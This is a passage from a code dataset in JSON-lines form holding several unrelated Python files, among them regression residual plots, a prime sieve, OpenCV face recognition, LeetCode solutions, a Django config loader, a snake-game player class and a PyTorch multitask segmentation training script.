perform_regression(x, y):\n x = x.reshape(-1, 1)\n reg = linear_model.LinearRegression().fit(x, y)\n pred = reg.predict(x)\n results = pd.DataFrame(pred, columns=['y_pred'])\n results['y_true'] = y\n return results\n\ndef lin_plot(results):\n pred = results['y_pred']\n y = results['y_true']\n r2 = metrics.r2_score(pred, y)\n mae = 
metrics.mean_absolute_error(pred, y)\n sns.pairplot(data=results, x_vars='y_pred', y_vars='y_true', kind='reg', size=5, aspect=1)\n plt.annotate('$R^2$=%.2f, MAE=%.2f' % (r2, mae), xy=(0.05, 0.95), xycoords='axes fraction')\n plt.show()\n\ndef residual_plots(y, pred):\n residuals = pred - y\n standardised_residuals = residuals / np.sqrt(pred)\n fig, ax = plt.subplots(2,2, figsize=(16,10))\n ax[0,0].scatter(x=pred, y=residuals, s=40)\n ax[0,0].axhline(y=0, c='black',linestyle='--')\n ax[0,0].set_title(\"Residuals\")\n sm.qqplot(residuals, line='s', ax=ax[0,1])\n ax[0,1].set_title(\"Residuals QQ Plot\")\n ax[1,0].scatter(pred, residuals, s=40)\n ax[1,0].axhline(y=0, c='black', linestyle='--')\n ax[1,0].set_title(\"Residuals vs Predictions\")\n ax[1,1].scatter(pred,standardised_residuals, s=40)\n ax[1,1].set_title(\"Standardised Residuals vs Predictions\")\n ax[1,1].axhline(y=3, c='black')\n ax[1,1].axhline(y=-3, c='black')\n plt.show()\n\n#%% Generate 2000 independent samples for x variable - normally distributed with a mean of 20 an stdev of 1\n\nx = np.random.normal(20, 1, size=200)\nplt.hist(x, density=True, histtype='step', bins=10)\nplt.show()\n\n#%% Generate y variables according to linear equation:\n### y = 2x + 3 + e\n### B1 = 2, c = 3, e = irreducible error\n\ny = 3 + 2*x + np.random.normal(20,1, size=200)\nplt.hist(y, density=True, histtype='step')\nplt.show()\n\n\n#%% Perform regression\n\nresults = perform_regression(x, y)\nlin_plot(results)\n\n#%% Residual plot analysis\n\nresidual_plots(y, results['y_pred'])\n\n#%% Generate non-linear data\n\ny_nonlin = 3 + 2*x+ np.random.exponential(scale=20, size=200)\nplt.scatter(x, y_nonlin)\nplt.show()\n\n#%% Perform regression\n\nresults_nonlin = perform_regression(x, y_nonlin)\nlin_plot(results)\n\n#%% Plot residuals\n\nresidual_plots(y_nonlin, results_nonlin['y_pred'])\n\n\n\n#%% Generate heteroskedatic data\n\nx_het = np.random.exponential(scale=1, size=200)\nplt.scatter(x_het, y)\nplt.show()\n\n\n#%%\n\ny_het= 3 + 2*x_het + np.random.normal(20,1, size=200)\nplt.hist(y_het, density=True, histtype='step')\nplt.show()\n\n#%% Perform regression\n\nresults_het = perform_regression(x_het, y_het)\nlin_plot(results_het)\n\n\n#%% Residual plots\n\nresidual_plots(y_het, results_het['y_pred'])\n","sub_path":"linear_regression/residuals.py","file_name":"residuals.py","file_ext":"py","file_size_in_byte":2803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"443976780","text":"def primes_sieve(limit):\n limitn = limit+1\n primes = dict()\n for i in range(2, limitn): primes[i] = True\n\n for i in primes:\n factors = range(i,limitn, i)\n for f in factors[1:]:\n primes[f] = False\n return [i for i in primes if primes[i]==True]\n\n\ndef palindromic_numbers(limit):\n\tlimitn = limit+1\n\tpalindromic = []\n\tfor i in range(limitn):\n\t\tif str(i) == str(i)[::-1]:\n\t\t\tpalindromic.append(i)\n\treturn palindromic\n\nprint('primes = [' + ', '.join(map(str, primes_sieve(10**6))) + ']')\nprint('palindromic = [' + ', '.join(map(str, palindromic_numbers(10**6))) + ']')\n","sub_path":"cf/315/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"283736485","text":"import numpy as np\nimport cv2\nimport pickle\nfrom PIL import Image\nimport os\nimport pathlib\n\nclass FaceCapture(object):\n\n def detect_face(self):\n img = \"app/faceshot0.png\"\n face_cascade = 
cv2.CascadeClassifier(\"C:/Users/prana/OneDrive/Desktop/web_dev/ocr_trial/flask_cbit_smart_attendance/app/face_recognition_training_files/haarcascade_frontalface_alt2.xml\")\n recognizer = cv2.face.LBPHFaceRecognizer_create()\n recognizer.read(\"C:/Users/prana/OneDrive/Desktop/web_dev/ocr_trial/flask_cbit_smart_attendance/app/trainer.yml\")\n\n labels = {\"160119733136\": 160119733136}\n filename = \"/C:/Users/prana/OneDrive/Desktop/web_dev/ocr_trial/flask_cbit_smart_attendance/app/labels.pickle\"\n HERE = pathlib.Path(__file__).parent\n with open(HERE/\"labels.pickle\", \"rb\") as f:\n og_labels = pickle.load(f)\n labels = {v:k for k,v in og_labels.items()}\n\n face_img = np.array(Image.open(img))\n face_img = cv2.resize(face_img, (450,450))\n gray = cv2.cvtColor(face_img, cv2.COLOR_BGR2GRAY)\n face_rects = face_cascade.detectMultiScale(face_img)\n for (x,y,w,h) in face_rects:\n cv2.rectangle(face_img, (x,y), (x+w,y+h), (255,255,255), 5)\n roi_gray = gray[y:y+h, x:x+w]\n roi_color = face_img[y:y+h, x:x+w]\n\n id_, conf = recognizer.predict(roi_gray)\n \n if \"id_\" in locals():\n return labels[id_]\n else:\n return \"Try Again\" \n ","sub_path":"flask_cbit_smart_attendance/app/face_cam.py","file_name":"face_cam.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"476288004","text":"import numpy as np\nimport h5py\nimport keras\nfrom keras.models import load_model\nimport pickle\n\nDATA_PATH = '/home/frederik/gitdisst/hand-orientation-inference/modelling/'\nMODEL_PATH = '/home/frederik/gitdisst/hand-orientation-inference/models/'\n\ndef labels_to_angles(labels):\n labels_angles = (labels * 180 / np.pi) - 90\n return labels_angles\n\ndef standardise_and_reshape_data(full, med, low):\n full = np.reshape(full, [len(full), 128, 128, 1])\n med = np.reshape(med, [len(med), 64, 64, 1])\n low = np.reshape(low, [len(low), 32, 32, 1])\n full = [x.astype('float32') for x in full]\n full = np.array([(x / 255) for x in full])\n med = [x.astype('float32') for x in med]\n med = np.array([x / 255 for x in med])\n low = [x.astype('float32') for x in low]\n low = np.array([x / 255 for x in low])\n return full, med, low\n\ndef get_best_and_worst_indices(errors, output_name, good_threshold=3, poor_threshold=20):\n under_indices_elevation = np.where(errors[:,0] < good_threshold)\n under_indices_zenith = np.where(errors[:,1] < good_threshold)\n over_indices_elevation = np.where(errors[:,0] > poor_threshold)\n over_indices_zenith = np.where(errors[:,1] < poor_threshold)\n return {output_name: [{'good_elev':under_indices_elevation},\n {'good_zen':under_indices_zenith},\n {'bad_elev':over_indices_elevation},\n {'bad_zen':over_indices_zenith}]}\n\n\nfull_res = np.load(DATA_PATH + 'AllBW.npy')\nmed_res = np.load(DATA_PATH + 'AllImagesBW64.npy')\nlow_res = np.load(DATA_PATH + 'AllImagesBW32.npy')\nlabels = np.load(DATA_PATH + 'AllAngles.npy')\n\ngood_model = load_model(MODEL_PATH + 'vanilla_15.h5')\nbad_model = load_model(MODEL_PATH + 'vanilla_15_bad.h5')\n\nfull, med, low = standardise_and_reshape_data(full_res, med_res, low_res)\n\ntest_index = int(len(full_res) * 0.8)\nfull = full[test_index:]\nmed = med[test_index:]\nlow = low[test_index:]\nlabels = labels[test_index:]\n\ngood_predictions = good_model.predict([full, med, low])\nbad_predictions = bad_model.predict([full, med, low])\n\ngood_angles = (good_predictions * 90) - 45\nbad_angles = (bad_predictions * 90) -45\ntrue_angles = 
labels_to_angles(labels)\n\ngood_error = abs(true_angles - good_angles)\nbad_error = abs(true_angles - bad_angles)\n\n\ngood_vanilla_indices = get_best_and_worst_indices(good_error, output_name='vanilla_good',\n                                                  good_threshold=3, poor_threshold=20)\n# not really relevant because constant predictor\nbad_vanilla_indices = get_best_and_worst_indices(bad_error, output_name='vanilla_bad',\n                                                  good_threshold=3, poor_threshold=20)\n\nwith open('good_vanilla_indices.pickle', 'wb') as handle:\n    pickle.dump(good_vanilla_indices, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\nwith open('bad_vanilla_indices.pickle', 'wb') as handle:\n    pickle.dump(bad_vanilla_indices, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\n\n\n","sub_path":"resultstesting/get_indices.py","file_name":"get_indices.py","file_ext":"py","file_size_in_byte":2978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"315427355","text":"\"\"\"\n\nGiven a string containing just the characters '(' and ')', find the length of the longest valid (well-formed) parentheses substring.\n\nFor \"(()\", the longest valid parentheses substring is \"()\", which has length = 2.\n\nAnother example is \")()())\", where the longest valid parentheses substring is \"()()\", which has length = 4.\n\"\"\"\n\"\"\"\nMy solution uses DP. The main idea is as follows: I construct an array longest[]; longest[i] stores the length of the longest valid parentheses substring that ends at i.\n\nAnd the DP idea is:\n\nIf s[i] is '(', set longest[i] to 0, because any string ending with '(' cannot be a valid one.\n\nElse if s[i] is ')'\n\n     If s[i-1] is '(', longest[i] = longest[i-2] + 2\n\n     Else if s[i-1] is ')' and s[i-longest[i-1]-1] == '(', longest[i] = longest[i-1] + 2 + longest[i-longest[i-1]-2]\n\nFor example, input \"()(())\", at i = 5, longest array is [0,2,0,0,2,0], longest[5] = longest[4] + 2 + longest[1] = 6.\nFor a min/max problem one usually thinks of DP or Greedy; Greedy clearly does not fit here, so DP it is.\n\n1. State:\nDP[i]: length of the longest valid parentheses substring ending at s[i-1].\n\n2. Recurrence:\ns[i] = '(':\nDP[i] = 0\n\ns[i] = ')': take the longest parentheses run ending at the previous character and look at the character just before it, j = i-2-DP[i-1]\nDP[i] = DP[i-1] + 2 + DP[j], if j >= 0 and s[j] = '('\nDP[i] = 0, if j < 0 or s[j] = ')'\n\n......... ( x x x x )\n          j       i-2 i-1\n\nProof: there is no j' < j such that s[j' : i] is a valid parentheses substring.\nIf such a j' existed, then s[j'+1 : i-1] would also be valid. Then for i-1:\n( x x x x x\nj' j'+1   i-1\nIn that case i-1 could not have a valid parentheses substring longer than S[j'+1 : i-1], contradicting the definition of DP[i-1].\n\n
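Complexity: a single left-to-right pass over s with the DP array, so O(n) time and O(n) extra space.\n\n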
3. Direction of computation\nClearly left to right, with DP[0] = 0\nhttp://bangbingsyb.blogspot.com/2014/11/leetcode-longest-valid-parentheses.html\n\"\"\"\nclass Solution(object):\n    def longestValidParentheses(self, s):\n        \"\"\"\n        :type s: str\n        :rtype: int\n        \"\"\"\n        if len(s) < 2:\n            return 0\n        longest = [0 for _ in range(len(s))]\n        max_length = 0\n        for i in range(1, len(s)):\n            if s[i] == \")\":\n                if s[i - 1] == \"(\": # case 1: (......)()\n                    longest[i] = longest[i - 2] + 2 if i >= 2 else 2\n                elif i - longest[i - 1] - 1 >= 0 and s[i - longest[i - 1] - 1] == \"(\": # ((...))\n                    longest[i] = longest[i - 1] + 2\n                    if i - longest[i - 1] - 2 >= 0: # if there is more in front: ....((....))\n                        longest[i] += longest[i - longest[i - 1] - 2]\n                max_length = max(max_length, longest[i])\n        return max_length\n\nclass Solution(object):\n    def longestValidParentheses(self, s):\n        \"\"\"\n        :type s: str\n        :rtype: int\n        \"\"\"\n        sol = [0 for _ in range(len(s))]\n        res = 0\n        for i in range(1, len(s)):\n            if s[i] == \")\":\n                if s[i - 1] == \"(\":\n                    sol[i] = 2 + (0 if i < 2 else sol[i - 2])\n                else:\n                    # a valid run ends at i-1, i.e. sol[i-1] exists\n                    if sol[i - 1] != 0:\n                        if i - 1 - sol[i - 1] >= 0 and s[i - 1 - sol[i - 1]] == \"(\":\n                            sol[i] = 2 + sol[i - 1] + (0 if i - sol[i - 1] - 2 < 0 else sol[i - 2 - sol[i - 1]])\n                res = max(res, sol[i])\n        return res \n\n\n\n","sub_path":"interview/others/hard/LC32. Longest Valid Parentheses.py","file_name":"LC32. Longest Valid Parentheses.py","file_ext":"py","file_size_in_byte":3411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"526772241","text":"class Solution:\n    def threeSumClosest(self, nums: List[int], target: int) -> int:\n        nums.sort()\n        \n        global_sum, global_diff = 0, float('inf')\n        for i in range(len(nums) - 2):\n            left = i + 1\n            right = len(nums) - 1\n            local_target = target - nums[i]\n            local_sum, local_diff = 0, float('inf')\n            while left < right:\n                cur_sum = nums[left] + nums[right]\n                cur_diff = abs(cur_sum - local_target)\n                if cur_diff < local_diff:\n                    local_sum = nums[left] + nums[right]\n                    local_diff = cur_diff\n                if cur_sum > local_target:\n                    right -= 1\n                else:\n                    left += 1\n            if local_diff < global_diff:\n                global_sum = nums[i] + local_sum\n                global_diff = local_diff\n        return global_sum\n\n","sub_path":"16_3Sum_Closest/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"294788786","text":"from django.conf import settings\n\nfrom django_configuration_management.aws_utils import pull_aws_config_data\nfrom django_configuration_management.utils import (\n    load_env,\n    normalize_config_data,\n)\nfrom django_configuration_management.yml_utils import yml_to_dict\n\n\ndef get_config(environment: str, dotenv_required=True):\n    try:\n        load_env(environment)\n    except AssertionError as error:\n        if dotenv_required:\n            raise error\n\n    local_secrets, aws_secrets = yml_to_dict(environment)\n\n    normalized_local_secrets = normalize_config_data(local_secrets)\n    pulled_aws_secrets = pull_aws_config_data(aws_secrets)\n\n    return {**normalized_local_secrets, **pulled_aws_secrets}\n\n\ndef inject_config(environment: str, settings_module: settings, dotenv_required=True):\n    config = get_config(environment, dotenv_required)\n\n    for key, value in config.items():\n        setattr(settings_module, key, value)\n","sub_path":"django_configuration_management/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"34835671","text":"from logging import getLogger\n\nfrom .messaging import Messaging\nfrom .snake import Snake\n\nlogger = getLogger(__name__)\n\n\nclass Player:\n snake = None\n\n def __init__(self, player_id, name, ws):\n self.id = player_id\n self.name = name\n self.wss = []\n self.score = 0\n self.keymap = {\n Messaging.CMD_LEFT: Snake.LEFT,\n Messaging.CMD_UP: Snake.UP,\n Messaging.CMD_RIGHT: Snake.RIGHT,\n Messaging.CMD_DOWN: Snake.DOWN,\n }\n self.add_connection(ws)\n\n def __repr__(self):\n return '<%s [id=%s] [name=%s] [color=%s]>' % (self.__class__.__name__, str(self.id)[:8], self.name, self.color)\n\n def add_connection(self, ws):\n self.wss.append(ws)\n\n def shutdown(self):\n self.wss.clear()\n\n def is_connection_closed(self):\n return any(ws.closed or ws.close_code for ws in self.wss)\n\n def new_snake(self, game_settings, world, color):\n self.snake = Snake(game_settings, world, color)\n\n def keypress(self, code):\n if not self.alive:\n return\n\n direction = self.keymap.get(code)\n snake_direction = self.snake.direction\n\n if direction and snake_direction:\n # do not move in the opposite direction\n if snake_direction == self.snake.current_direction and not (\n direction.xdir == -snake_direction.xdir and\n direction.ydir == -snake_direction.ydir):\n self.snake.direction = direction\n logger.info('%r changed direction to %r', self, direction)\n\n @property\n def alive(self):\n if self.snake:\n return self.snake.alive\n else:\n return False\n\n @alive.setter\n def alive(self, value):\n self.snake.alive = value\n\n @property\n def color(self):\n if self.snake:\n return self.snake.color\n else:\n return None\n\n @property\n def direction(self):\n if self.snake:\n return self.snake.direction\n else:\n return None\n","sub_path":"snakepit/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"219804821","text":"from datetime import datetime\nfrom itertools import chain\nimport os\nfrom pprint import pprint\nimport random\nfrom timeit import default_timer\nimport warnings\n\nimport cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sn\nfrom sklearn.metrics import confusion_matrix\nfrom tensorboardX import SummaryWriter\nimport timeit\nimport torch\nimport torch.distributed as distr\nimport torch.multiprocessing as multiproc\nimport torch.nn as nn\nfrom torch.nn.parallel import DistributedDataParallel\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader, sampler\nfrom torch.utils.data.distributed import DistributedSampler\nimport torchvision.transforms as T\nfrom torchvision.utils import make_grid\nfrom tqdm import tqdm\n\nfrom datasets.voc_dual_task import VOCDualTask\nfrom models.losses.losses import MeanSquaredAngularLoss\nfrom models.deeplabv3plus_multitask import Deeplabv3plus_multitask\nimport transforms.transforms as myT\nfrom config.config import VOCConfig\nimport utils.utils as utils\n\n\ncfg = VOCConfig()\n\n# Fix all seeds for reproducibility\nseed = 777\nrandom.seed(seed)\nnp.random.seed(seed)\ntorch.manual_seed(seed)\n#torch.backends.cudnn.deterministic = True\n#torch.backends.cudnn.benchmark = False\n\n\n\ndef calc_iou(confusion_matrix):\n \"\"\"\n Calculates per-class IoUs from numpy confusion matrix.\n \"\"\"\n class_iou = [0] * len(confusion_matrix)\n\n for i in range(len(confusion_matrix)):\n\n intersection = confusion_matrix[i,i]\n union = 
np.sum(confusion_matrix[i,:]) + np.sum(confusion_matrix[:,i]) - intersection\n \n if union == 0:\n warnings.warn(\"IoU calculation: union is zero!\")\n class_iou[i] = 0\n else:\n class_iou[i] = intersection / union\n \n return class_iou\n\n\ndef calc_confusion_matrix(target, prediction, labels):\n \"\"\"\n Computes confusion matrix. NOTE: predictions need to be already argmaxed\n \"\"\"\n\n target = target.flatten()\n prediction = prediction.flatten()\n\n conf_matrix = confusion_matrix(target, prediction, labels=labels)\n \n return conf_matrix\n\n\ndef setup_dataloaders(rank):\n \"\"\"\n Initialise datasets, samplers and return dataloaders.\n \"\"\"\n\n # Dataset transforms\n transform = T.Compose([\n myT.Quantise(level_widths=cfg.LEVEL_WIDTHS),\n myT.Resize(cfg.DATA_RESCALE),\n myT.RandomResizedCrop(cfg.RESIZEDCROP_SCALE_RANGE, cfg.DATA_RESCALE),\n myT.RandomHorizontalFlip(),\n myT.ColourJitter(cfg.BRIGHTNESS, cfg.CONTRAST, cfg.SATURATION, cfg.HUE),\n myT.ToTensor()])\n\n # Datasets\n VOC_train = VOCDualTask(\n cfg.DSET_ROOT,\n image_set=\"train\",\n transform=transform)\n VOC_val = VOCDualTask(\n cfg.DSET_ROOT,\n image_set=\"val\",\n transform=transform)\n \n # Distributed samplers\n sampler_train = DistributedSampler(\n VOC_train,\n num_replicas=cfg.TRAIN_GPUS,\n rank=rank)\n sampler_val = DistributedSampler(\n VOC_val,\n num_replicas=cfg.TRAIN_GPUS,\n rank=rank)\n\n # Data loaders\n loader_train = DataLoader(\n VOC_train,\n batch_size=cfg.TRAIN_BATCH_SIZE,\n sampler=sampler_train,\n num_workers=cfg.DATALOADER_JOBS,\n pin_memory=True,\n drop_last=True)\n loader_val = DataLoader(\n VOC_val,\n batch_size=cfg.VAL_BATCH_SIZE,\n sampler=sampler_val,\n num_workers=cfg.DATALOADER_JOBS,\n pin_memory=True,\n drop_last=True)\n \n return loader_train, loader_val\n\n\ndef setup_model(rank):\n \"\"\"\n Initialise model and load pretrained backbone weights.\n \"\"\"\n backbone = \"xception\"\n \n # Initialise model\n model = Deeplabv3plus_multitask(\n seg_classes=cfg.N_CLASSES,\n dist_classes=cfg.N_ENERGY_LEVELS,\n third_branch=False,\n backbone=backbone)\n # Convert batchnorm to synchronised batchnorm\n model = torch.nn.SyncBatchNorm.convert_sync_batchnorm(model)\n model.to(rank)\n if rank == 0:\n print(\n \"GPUs found:\", torch.cuda.device_count(),\n \"\\tGPUs used by all processes:\", cfg.TRAIN_GPUS)\n # Wrap in distributed dataparallel\n model = DistributedDataParallel(model, device_ids=[rank], output_device=rank, find_unused_parameters=True)\n \n # Load pretrained model weights only for backbone network, if backbone is xception\n if cfg.USE_PRETRAINED and backbone == \"xception\":\n current_dict = model.state_dict()\n pretrained_dict = torch.load(os.path.join(\n cfg.PRETRAINED_PATH,\n \"mod_al_xception_imagenet.pth\"))\n # Keys of pretrained model need to be modified so they match keys\n # of backbone in new model\n pretrained_dict = {\n \"module.backbone.\" + k: v for k, v in pretrained_dict.items()\n }\n\n current_dict.update(pretrained_dict)\n model.load_state_dict(current_dict)\n\n if rank == 0:\n print(\"Loaded pretrained backbone.\")\n \n if rank == 0:\n # Print number of model parameters\n n_params = sum(p.numel() for p in model.parameters() if p.requires_grad)\n print(\"Number of learnable parameters:\", n_params)\n \n return model\n\n\ndef log_all_confusion_mat(\n logger,\n train_seg,\n train_dist,\n val_seg,\n val_dist,\n epoch,\n isnormalised):\n \"\"\"\n Logs confusion matrices for segmentation and distance transform, and for \n training and validation data (4 matrices in total).\n 
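The isnormalised flag only switches the logged tag postfix and the cell number format.\n    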
Args:\n - logger: tensorboard logger.\n - train_seg\n - train_dist\n - val_seg\n - val_dist\n - epoch: current training epoch.\n - isnormalised (bool): whether the matrices are normalised or not.\n \"\"\"\n\n postfix = \"\"\n fmt = \"0.0f\"\n if isnormalised:\n postfix = \"_n\"\n fmt = \"0.3f\"\n\n utils.log_confusion_mat(\n logger,\n train_seg,\n (16,10),\n \"train_confusion_seg\" + postfix,\n fmt,\n epoch,\n list(cfg.CLASSES.values()),\n list(cfg.CLASSES.values()))\n utils.log_confusion_mat(\n logger,\n train_dist,\n (9,7),\n \"train_confusion_dist\" + postfix,\n fmt,\n epoch,\n \"auto\",\n \"auto\")\n utils.log_confusion_mat(\n logger,\n val_seg,\n (16,10),\n \"val_confusion_seg\" + postfix,\n fmt,\n epoch,\n list(cfg.CLASSES.values()),\n list(cfg.CLASSES.values()))\n utils.log_confusion_mat(\n logger,\n val_dist,\n (9,7),\n \"val_confusion_dist\" + postfix,\n fmt,\n epoch,\n \"auto\",\n \"auto\")\n\n\ndef train(rank, world_size):\n \"\"\"\n Training function. Multiple processes will be spawned with this function.\n\n Args:\n - rank (int): index of current process.\n - world_size (int): total number of processes.\n \"\"\"\n\n # Set address and port of master process\n # (it's required, even though I'm training on only one machine)\n os.environ[\"MASTER_ADDR\"] = \"localhost\"\n os.environ[\"MASTER_PORT\"] = \"12355\"\n\n # Initialize process group\n distr.init_process_group(\"gloo\", rank=rank, world_size=world_size)\n\n # Specify GPU to send this process to\n torch.cuda.set_device(rank)\n\n # Dataloaders\n loader_train, loader_val = setup_dataloaders(rank)\n\n # Initialise tensorboardX logger only in process 0\n if cfg.LOG and rank == 0:\n now = datetime.now()\n tbX_logger = SummaryWriter(\n os.path.join(cfg.LOG_PATH, now.strftime(\"%Y%m%d-%H%M\")))\n\n # Model setup\n model = setup_model(rank)\n\n # Set losses for semantic, distance and gradient direction\n seg_criterion = nn.CrossEntropyLoss(ignore_index=255)\n\n total_px = cfg.DATA_RESCALE ** 2\n weights = torch.tensor([\n total_px / 2789,\n total_px / 6636,\n total_px / 10678,\n total_px / 26170,\n total_px / 27594,\n total_px / 33966,\n total_px / 33467,\n total_px / 40680,\n total_px / 39469,\n total_px / 40696\n ]).to(rank)\n dist_criterion = nn.CrossEntropyLoss(weight=weights)\n\n #grad_criterion = MeanSquaredAngularLoss()\n\n\n # Optimiser setup\n optimiser = optim.SGD(\n params = model.parameters(),\n lr = cfg.TRAIN_LR,\n momentum=cfg.TRAIN_MOMENTUM)\n\n # Initialise iteration index\n i = 0\n max_i = cfg.TRAIN_EPOCHS * len(loader_train)\n\n # Train loop\n for epoch in range(cfg.TRAIN_EPOCHS):\n \n # These values only need to be logged in process 0\n if rank == 0:\n train_loss = 0.\n train_seg_loss = 0.\n train_dist_loss = 0.\n #train_grad_loss = 0.\n\n if cfg.LOG:\n # Initialise confusion matrices\n train_seg_confusion = np.zeros(\n (cfg.N_CLASSES, cfg.N_CLASSES),\n dtype=\"float\")\n train_dist_confusion = np.zeros(\n (cfg.N_ENERGY_LEVELS, cfg.N_ENERGY_LEVELS),\n dtype=\"float\")\n val_seg_confusion = np.zeros(\n (cfg.N_CLASSES, cfg.N_CLASSES),\n dtype=\"float\")\n val_dist_confusion = np.zeros(\n (cfg.N_ENERGY_LEVELS, cfg.N_ENERGY_LEVELS),\n dtype=\"float\")\n \n # Initialise tqdm only on process 0\n if rank == 0:\n loader_train = tqdm(loader_train, ascii=True, desc=\"Train\")\n\n model.train()\n\n for train_batch_i, train_batch in enumerate(loader_train):\n\n train_inputs = train_batch[\"image\"].to(rank)\n\n # Categorical labels need to be converted from float 0-1 to integers\n train_seg = 
train_batch[\"seg\"].mul(255).round().long().squeeze(1).to(rank)\n            train_dist = train_batch[\"dist\"].mul(255).round().long().squeeze(1).to(rank)\n\n            # gradient direction is not categorical, so no conversion\n            #train_grad = train_batch[\"grad\"].to(rank)\n\n            if cfg.ADJUST_LR:\n                lr = utils.adjust_lr(\n                    optimiser,\n                    i,\n                    max_i,\n                    cfg.TRAIN_LR,\n                    cfg.TRAIN_POWER)\n            else:\n                lr = cfg.TRAIN_LR\n\n            optimiser.zero_grad()\n\n            train_predicted_seg, train_predicted_dist = model(train_inputs)\n\n            # Calculate losses\n            seg_loss = seg_criterion(train_predicted_seg, train_seg)\n            dist_loss = dist_criterion(train_predicted_dist, train_dist)\n            #grad_loss = grad_criterion(train_predicted_grad, train_grad)\n            loss = seg_loss + dist_loss # + grad_loss\n            loss.backward()\n            optimiser.step()\n\n            i += 1\n\n            # Update losses to display\n            if rank == 0:\n                train_loss += loss.item()\n                train_seg_loss += seg_loss.item()\n                train_dist_loss += dist_loss.item()\n                #train_grad_loss += grad_loss.item()\n\n            batch_pixels = cfg.DATA_RESCALE ** 2 * cfg.TRAIN_BATCH_SIZE\n            seg_argmax = torch.argmax(train_predicted_seg, dim=1)\n            dist_argmax = torch.argmax(train_predicted_dist, dim=1)\n\n            if rank == 0 and cfg.LOG and (epoch % 20 == 0 or epoch == cfg.TRAIN_EPOCHS - 1):\n                # Accumulate confusion matrices\n                train_seg_confusion += calc_confusion_matrix(\n                    train_seg.cpu(),\n                    seg_argmax.cpu(),\n                    labels=list(cfg.CLASSES.keys())\n                    ) / cfg.TRAIN_BATCH_SIZE\n                train_dist_confusion += calc_confusion_matrix(\n                    train_dist.cpu(),\n                    dist_argmax.cpu(),\n                    labels=list(range(cfg.N_ENERGY_LEVELS))\n                    ) / cfg.TRAIN_BATCH_SIZE\n\n        # Again, only log on process 0\n        if rank == 0:\n            val_loss = 0.\n            val_seg_loss = 0.\n            val_dist_loss = 0.\n            #val_grad_loss = 0.\n\n        # Initialise tqdm\n        if rank == 0:\n            loader_val = tqdm(loader_val, ascii=True, desc=\"Valid\")\n\n        model.eval()\n\n        with torch.no_grad():\n            for val_batch_i, val_batch in enumerate(loader_val):\n\n                val_inputs = val_batch[\"image\"].to(rank)\n                val_seg = val_batch[\"seg\"].mul(255).round().long().squeeze(1).to(rank)\n                val_dist = val_batch[\"dist\"].mul(255).round().long().squeeze(1).to(rank)\n                #val_grad = val_batch[\"grad\"].to(rank)\n\n                val_predicted_seg, val_predicted_dist = model(val_inputs)\n\n                # Calculate losses\n                if rank == 0:\n                    seg_loss = seg_criterion(val_predicted_seg, val_seg)\n                    dist_loss = dist_criterion(val_predicted_dist, val_dist)\n                    #grad_loss = grad_criterion(val_predicted_grad, val_grad)\n                    loss = seg_loss + dist_loss # + grad_loss\n                    val_loss += loss.item()\n                    val_seg_loss += seg_loss.item()\n                    val_dist_loss += dist_loss.item()\n                    #val_grad_loss += grad_loss.item()\n\n                batch_pixels = cfg.DATA_RESCALE ** 2 * cfg.VAL_BATCH_SIZE\n                seg_argmax = torch.argmax(val_predicted_seg, dim=1)\n                dist_argmax = torch.argmax(val_predicted_dist, dim=1)\n\n                if rank == 0 and cfg.LOG and (epoch % 20 == 0 or epoch == cfg.TRAIN_EPOCHS - 1):\n                    # Accumulate confusion matrices\n                    val_seg_confusion += calc_confusion_matrix(\n                        val_seg.cpu(),\n                        seg_argmax.cpu(),\n                        labels=list(cfg.CLASSES.keys())\n                        ) / cfg.VAL_BATCH_SIZE\n                    val_dist_confusion += calc_confusion_matrix(\n                        val_dist.cpu(),\n                        dist_argmax.cpu(),\n                        labels=list(range(cfg.N_ENERGY_LEVELS))\n                        ) / cfg.VAL_BATCH_SIZE\n\n        # Only print info and log to tensorboard in process 0\n        if rank == 0:\n            # Average training losses on all batches\n            train_loss /= len(loader_train)\n            train_seg_loss /= len(loader_train)\n            train_dist_loss /= len(loader_train)\n            #train_grad_loss /= len(loader_train)\n\n            # Average validation losses on batches\n            val_loss /= len(loader_val)\n            val_seg_loss /= len(loader_val)\n            val_dist_loss /= 
len(loader_val)\n #val_grad_loss /= len(loader_val)\n\n print(\"Epoch: %d/%d\\ti: %d\\tlr: %g\\ttrain_loss: %g\\tval_loss: %g\\n\"\n % (epoch+1, cfg.TRAIN_EPOCHS, i, lr, train_loss, val_loss))\n\n if cfg.LOG:\n # Log scalars to tensorboardX\n tbX_logger.add_scalars(\n \"total_losses\", {\n \"train_loss\": train_loss,\n \"val_loss\": val_loss\n },\n epoch)\n tbX_logger.add_scalars(\n \"seg_loss\", { \n \"train_seg_loss\": train_seg_loss,\n \"val_seg_loss\": val_seg_loss\n },\n epoch)\n tbX_logger.add_scalars(\n \"dist_loss\", {\n \"train_dist_loss\": train_dist_loss,\n \"val_dist_loss\": val_dist_loss\n },\n epoch) \n tbX_logger.add_scalar(\"lr\", lr, epoch)\n\n # it seems like tensorboard doesn't like saving a lot of images,\n # so log images only every few epochs\n if epoch % 20 == 0 or epoch == cfg.TRAIN_EPOCHS - 1:\n\n\n # Calculate IoUs from confusion matrices\n train_seg_iou = calc_iou(train_seg_confusion)\n train_dist_iou = calc_iou(train_dist_confusion)\n val_seg_iou = calc_iou(val_seg_confusion)\n val_dist_iou = calc_iou(val_dist_confusion)\n \n tbX_logger.add_scalars(\n \"seg_iou\", {\n \"train_seg_iou\": 